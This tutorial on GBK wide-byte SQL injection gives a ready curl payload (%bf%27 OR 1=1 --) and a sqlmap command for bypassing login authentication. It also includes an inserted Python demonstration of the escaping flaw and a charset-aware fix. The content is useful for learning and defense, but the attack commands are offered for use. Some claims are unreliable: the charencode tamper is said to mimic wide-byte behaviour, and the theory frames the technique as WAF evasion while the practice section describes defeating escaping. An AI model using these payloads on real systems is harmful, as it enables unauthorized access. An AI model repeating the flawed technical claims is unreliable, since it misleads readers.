Wide Byte Injection (GBK)
Context
Wide Byte Injection is a specialized SQL injection technique leveraging the GBK character encoding to bypass Web Application Firewalls (WAFs). This method exploits the way certain encodings handle multi-byte characters, allowing attackers to evade traditional input validation mechanisms. The focus here is on exploiting MySQL databases protected by WAFs that inadequately interpret GBK-encoded characters. This article assumes familiarity with character encodings, SQL queries, and basic WAF functionality.
Theory
GBK Encoding and Wide Byte Injection
GBK stands for "GuoBiao Kuozhan," an extension of the GuoBiao (GB) character set used in Chinese computing environments. It encodes each character in one or two bytes, and that variable length is what wide byte injection exploits.
Wide Byte Injection takes advantage of this encoding by injecting byte sequences that are read as multi-byte characters. This can confuse the input validation routines of a WAF, which may fail to correctly parse or sanitize input containing such characters, allowing SQL injection.
In practice, an attacker injects a wide byte character sequence into SQL queries, causing the WAF to validate or filter the input incorrectly and so bypassing its controls.
Character Encoding Vulnerabilities
Character encoding vulnerabilities arise when a system incorrectly handles or interprets various encodings. In the context of GBK, the use of multi-byte character sequences can be manipulated to bypass conventional security barriers such as WAFs.
These vulnerabilities emerge from implementation flaws where applications assume consistent handling of input data without considering variations in encoding length or encoding types.
Bypassing WAF with Encoding
WAFs commonly use pattern matching to identify and filter malicious input. Wide byte injection can circumvent these defenses by exploiting discrepancies in how multi-byte encodings are processed.
Crafting an injection payload with wide byte sequences can evade pattern matching rules, especially when a WAF lacks robust handling for all character encoding formats.
Practice
Wide Byte Injection in GBK
In this manual technique, we demonstrate how to use wide byte injection to perform SQL injection against a vulnerable target.
- Command Line:
  curl -X POST -d "username=admin&password=%bf%27 OR 1=1 -- " http://target.com/login
  This command sends a POST request with a payload designed to exploit GBK encoding. %bf is a GBK lead byte, so the byte that follows it is consumed as the second half of a two-byte character: if the application inserts a backslash in front of the %27 quote, that backslash is swallowed into the wide character and the quote reaches the SQL parser unescaped, altering the query logic.
- Observation: After executing the command, observe the server's response. Check for successful authentication without valid credentials, or for SQL error output that confirms injection.
Outcome
This approach can lead to authentication bypass, granting unauthorized access by subverting login mechanisms.
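As an added illustration, not part of the original article, the following Python shows what the %bf%27 payload above does to a byte-level quote-escaping layer once the database reads the query as GBK, and a charset-aware escaping function that closes the gap. The query template, the users table and the helper names are assumptions made for the demonstration.

```python
from typing import Optional

def naive_escape(raw: bytes) -> bytes:
    """addslashes-style escaping that works on raw bytes, unaware of the charset."""
    return raw.replace(b"\\", b"\\\\").replace(b"'", b"\\'")

def build_query(escaped: bytes) -> bytes:
    # Assumed query template for the demonstration.
    return b"SELECT 1 FROM users WHERE password = '" + escaped + b"'"

def injected_tail(query: bytes, charset: str) -> str:
    """Decode the query as a server using `charset` would and return whatever
    follows the first string literal. An empty tail means the user-controlled
    quote never broke out of the literal; anything else is injected SQL."""
    text = query.decode(charset, errors="replace")
    i = text.index("'") + 1
    while i < len(text):
        if text[i] == "\\":          # a backslash escapes the next character
            i += 2
        elif text[i] == "'":         # an unescaped quote closes the literal
            return text[i + 1:]
        else:
            i += 1
    return ""

def charset_aware_escape(raw: bytes, charset: str) -> Optional[bytes]:
    """Decode first (rejecting byte sequences that are invalid in `charset`),
    escape at the character level, then re-encode. A stray lead byte can no
    longer swallow the escaping backslash. Parameterised queries are still the
    preferred fix; this only repairs the escaping layer."""
    try:
        text = raw.decode(charset)
    except UnicodeDecodeError:
        return None
    text = text.replace("\\", "\\\\").replace("'", "\\'")
    return text.encode(charset)

# Constructed sample inputs
PAYLOAD = b"\xbf' OR 1=1 -- "     # the %bf%27 payload from the article, URL-decoded
LEGIT = "中'".encode("gbk")        # a real two-byte GBK character followed by a quote

if __name__ == "__main__":
    q = build_query(naive_escape(PAYLOAD))
    # Under a single-byte charset the backslash protects the quote: tail is ''.
    print(repr(injected_tail(q, "latin-1")))
    # Under GBK, 0xBF 0x5C is one character, so the quote is live: tail is " OR 1=1 -- '".
    print(repr(injected_tail(q, "gbk")))
    print(charset_aware_escape(PAYLOAD, "gbk"))   # None: 0xBF 0x27 is not valid GBK
    print(charset_aware_escape(LEGIT, "gbk"))     # legitimate multi-byte input still accepted
```

The same mismatch appears whenever escaping runs under one charset and the connection uses another, so the connection charset should be set through the database client rather than assumed.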
Automated Wide Byte Injection
Leverage automation tools like sqlmap to perform wide byte injection efficiently.
- Script for Exploitation:
  sqlmap -u "http://target.com/login" --data="username=admin&password=*" --technique=E --tamper=charencode
  Here, sqlmap uses a tamper script (charencode) to mimic wide byte behavior, scanning for SQL injection points while bypassing WAF filters.
- Review Output: Analyze the output of sqlmap for signs of successful injection. Look for indicators such as database banners or unauthorized data access confirming SQL injection was achieved.
Outcome
Using automated tools, attackers can bypass authentication controls through wide byte injection, gaining unauthorized entry into the system.
Tools
- curl
- sqlmap